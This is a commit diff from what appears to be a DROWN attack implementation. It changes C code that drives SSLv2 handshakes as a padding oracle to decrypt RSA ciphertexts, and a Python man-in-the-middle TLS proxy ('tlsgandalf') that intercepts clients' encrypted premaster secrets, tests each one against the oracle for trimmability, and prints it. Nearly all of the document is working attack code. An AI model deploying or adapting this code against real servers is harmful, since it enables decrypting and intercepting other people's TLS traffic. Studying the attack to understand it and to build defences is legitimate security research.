Skip to content

Commit e91f500

Browse files
Tim---Tim---
committed
Little fixes and additions
1 parent 445c3a7 commit e91f500

File tree

4 files changed

+71
-18
lines changed

4 files changed

+71
-18
lines changed

Makefile

+5-4
Original file line numberDiff line numberDiff line change
@@ -1,18 +1,19 @@
1-
CFLAGS=-I$(SSL_PREFIX)/include
1+
CFLAGS=-I$(SSL_PREFIX)/include -O3
2+
#CFLAGS=-I$(SSL_PREFIX)/include -g
23
LDFLAGS=-Wl,-rpath,$(SSL_PREFIX)/lib -L $(SSL_PREFIX)/lib -lssl -lcrypto -ldl -lm
34
DECRYPT_OBJS=drown.o oracle.o trimmers.o decrypt.o utils.o
45
TRIMMABLE_OBJS=trimmable.o oracle.o trimmers.o decrypt.o utils.o
56

67
all: decrypt trimmable
78

89
decrypt: $(DECRYPT_OBJS)
9-
gcc -g -o $@ $^ $(LDFLAGS)
10+
gcc -o $@ $^ $(LDFLAGS)
1011

1112
trimmable: $(TRIMMABLE_OBJS)
12-
gcc -g -o $@ $^ $(LDFLAGS)
13+
gcc -o $@ $^ $(LDFLAGS)
1314

1415
%.o: %.c
15-
gcc -g -c -o $@ $^ $(CFLAGS)
16+
gcc -c -o $@ $^ $(CFLAGS)
1617

1718
clean:
1819
rm -f decrypt trimmable $(DECRYPT_OBJS) $(TRIMMABLE_OBJS)

decrypt.c

+20-4
Original file line numberDiff line numberDiff line change
@@ -28,10 +28,10 @@ void oracle_guess(drown_ctx *dctx, BIGNUM *c, BIGNUM *k, int bsize)
2828
}
2929

3030
/*
31-
Checks whether c is valid.
31+
Checks whether c is valid for any length of padding we know.
3232
Returns the numbers of bits we can learn (0 if invalid).
3333
*/
34-
int oracle_valid(drown_ctx *dctx, BIGNUM *c)
34+
int oracle_valid_multiple(drown_ctx *dctx, BIGNUM *c)
3535
{
3636
unsigned char enc_key[256] = {0};
3737

@@ -40,13 +40,29 @@ int oracle_valid(drown_ctx *dctx, BIGNUM *c)
4040

4141
// Run the oracle
4242
int size = run_oracle_valid_multiple(dctx->hostport, enc_key, 256);
43-
4443
if(size == 0)
4544
return 0;
4645
else
4746
return (size + 1) * 8;
4847
}
4948

49+
/*
50+
Checks whether c is correctly padded to 24 bytes.
51+
Returns the numbers of bits we can learn (0 if invalid).
52+
*/
53+
int oracle_valid(drown_ctx *dctx, BIGNUM *c)
54+
{
55+
unsigned char enc_key[256] = {0};
56+
57+
// Convert c to array
58+
BN_bn2bin(c, enc_key + 256 - BN_num_bytes(c));
59+
60+
// Run the oracle
61+
if(run_oracle_valid(dctx->hostport, 24, enc_key, 256))
62+
return 25*8;
63+
return 0;
64+
}
65+
5066
/*
5167
Finds a multiplier s, so that c * (s * l_1) ** e is valid
5268
Updates c, s, mt, l, ?
@@ -126,7 +142,7 @@ void decrypt(drown_ctx *dctx)
126142
// where g is the bits of m0 (found by the oracle)
127143

128144

129-
int l = oracle_valid(dctx, c);
145+
int l = oracle_valid_multiple(dctx, c);
130146
oracle_guess(dctx, c, mt, l);
131147
int u = 2032;
132148
BN_set_bit(mt, 2033);

oracle.c

+10-3
Original file line numberDiff line numberDiff line change
@@ -104,7 +104,7 @@ void send_client_hello(SSL *s)
104104
}
105105

106106

107-
void recv_server_hello(SSL *s)
107+
int recv_server_hello(SSL *s)
108108
{
109109
unsigned int n;
110110
oracle_ssl2_do_read(s);
@@ -133,7 +133,9 @@ void recv_server_hello(SSL *s)
133133

134134
// CIPHER-SPECS-LENGTH
135135
n2s(p, n);
136-
assert(n > 0);
136+
if(n == 0)
137+
// cipher not supported ?
138+
return 0;
137139

138140
// CIPHER-SPECS
139141
s->session->cipher = s->method->get_cipher_by_char(d);
@@ -147,6 +149,8 @@ void recv_server_hello(SSL *s)
147149
// CONNECTION-ID
148150
memcpy(s->s2->conn_id, d, n);
149151
d += n;
152+
153+
return 1;
150154
}
151155

152156
void send_client_master_key(SSL *s, unsigned char *master_key, unsigned int clear_key_length, unsigned char *encrypted_key, unsigned int encrypted_key_length)
@@ -307,7 +311,8 @@ SSL * oracle_query(char *hostport, unsigned int keysize, unsigned char *clear_ke
307311
// We are connected, great !
308312
// Now send client hello
309313
send_client_hello(ssl);
310-
recv_server_hello(ssl);
314+
if(!recv_server_hello(ssl))
315+
return NULL;
311316
send_client_master_key(ssl, clear_key, clear_key_length, encrypted_key, encrypted_key_length);
312317
// Now we can "start" the encryption
313318
ssl->s2->clear_text=0;
@@ -330,6 +335,8 @@ int run_oracle_valid(char *hostport, unsigned int keysize, unsigned char *encryp
330335
memset(clear_key, 0, keysize);
331336

332337
SSL *ssl = oracle_query(hostport, keysize, clear_key, sizeof(clear_key), encrypted_key, encrypted_key_length);
338+
if(ssl == NULL)
339+
return 0;
333340

334341
int res = oracle_check_valid(ssl);
335342

tlsgandalf.py

+36-7
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,7 @@ def handshakeProxy(c_conn, s_conn, oracle):
2222
else: break
2323
clientHello = result
2424

25-
c_conn.version = clientHello.client_version
25+
c_conn.version = (3, 1) # TODO : Hardcoded version ?
2626

2727
for result in c_conn._sendMsg(clientHello):
2828
yield result
@@ -45,14 +45,27 @@ def handshakeProxy(c_conn, s_conn, oracle):
4545
# CERTIFICATE S -> C
4646
for result in c_conn._getMsg(ContentType.handshake,
4747
HandshakeType.certificate,
48-
serverHello.certificate_type):
48+
serverHello.certificate_type): # FIXME : we should only allow RSA
4949
if result in (0,1): yield result
5050
else: break
51-
certificate = result
51+
serverCertificate = result
5252

53-
for result in s_conn._sendMsg(certificate):
53+
for result in s_conn._sendMsg(serverCertificate):
5454
yield result
5555

56+
57+
# TODO : this part is optional
58+
# CERTIFICATE REQUEST S -> C
59+
for result in c_conn._getMsg(ContentType.handshake,
60+
HandshakeType.certificate_request):
61+
if result in (0,1): yield result
62+
else: break
63+
certificate_request = result
64+
65+
for result in s_conn._sendMsg(certificate_request):
66+
yield result
67+
68+
5669
# SERVER HELLO DONE S -> C
5770
for result in c_conn._getMsg(ContentType.handshake,
5871
HandshakeType.server_hello_done):
@@ -63,6 +76,19 @@ def handshakeProxy(c_conn, s_conn, oracle):
6376
for result in s_conn._sendMsg(serverHelloDone):
6477
yield result
6578

79+
# TODO : this part is optional
80+
# CERTIFICATE C -> S
81+
for result in s_conn._getMsg(ContentType.handshake,
82+
HandshakeType.certificate,
83+
serverHello.certificate_type): # FIXME : we should allow anything ?
84+
if result in (0,1): yield result
85+
else: break
86+
clientCertificate = result
87+
88+
for result in c_conn._sendMsg(clientCertificate):
89+
yield result
90+
91+
6692
# CLIENT KEY EXCHANGE C -> S
6793
for result in s_conn._getMsg(ContentType.handshake,
6894
HandshakeType.client_key_exchange,
@@ -75,8 +101,11 @@ def handshakeProxy(c_conn, s_conn, oracle):
75101
epms = clientKeyExchange.encryptedPreMasterSecret
76102
if not oracle(epms):
77103
# YOU SHALL NOT PASS !
104+
print("You shall not pass")
78105
return
79106

107+
print("Found trimmer !")
108+
80109
print(hexlify(epms).decode())
81110

82111
# If it's ok, continue
@@ -110,9 +139,9 @@ def handshakeProxy(c_conn, s_conn, oracle):
110139

111140
# Get parameters
112141
listenaddr, connectaddr, oracleaddr, cert = sys.argv[1:]
113-
listenaddr = (listenaddr.split(':')[0], int(listenaddr.split(':')[1]))
114-
connectaddr = (connectaddr.split(':')[0], int(connectaddr.split(':')[1]))
115-
oracleaddr = (oracleaddr.split(':')[0], int(oracleaddr.split(':')[1]))
142+
listenaddr = (listenaddr.rsplit(':', 1)[0], int(listenaddr.rsplit(':', 1)[1]))
143+
connectaddr = (connectaddr.rsplit(':', 1)[0], int(connectaddr.rsplit(':', 1)[1]))
144+
oracleaddr = (oracleaddr.rsplit(':', 1)[0], int(oracleaddr.rsplit(':', 1)[1]))
116145

117146
oracle = lambda epms: not subprocess.call(["./trimmable", '{}:{}'.format(*oracleaddr), cert, hexlify(epms)])
118147

0 commit comments

Comments
 (0)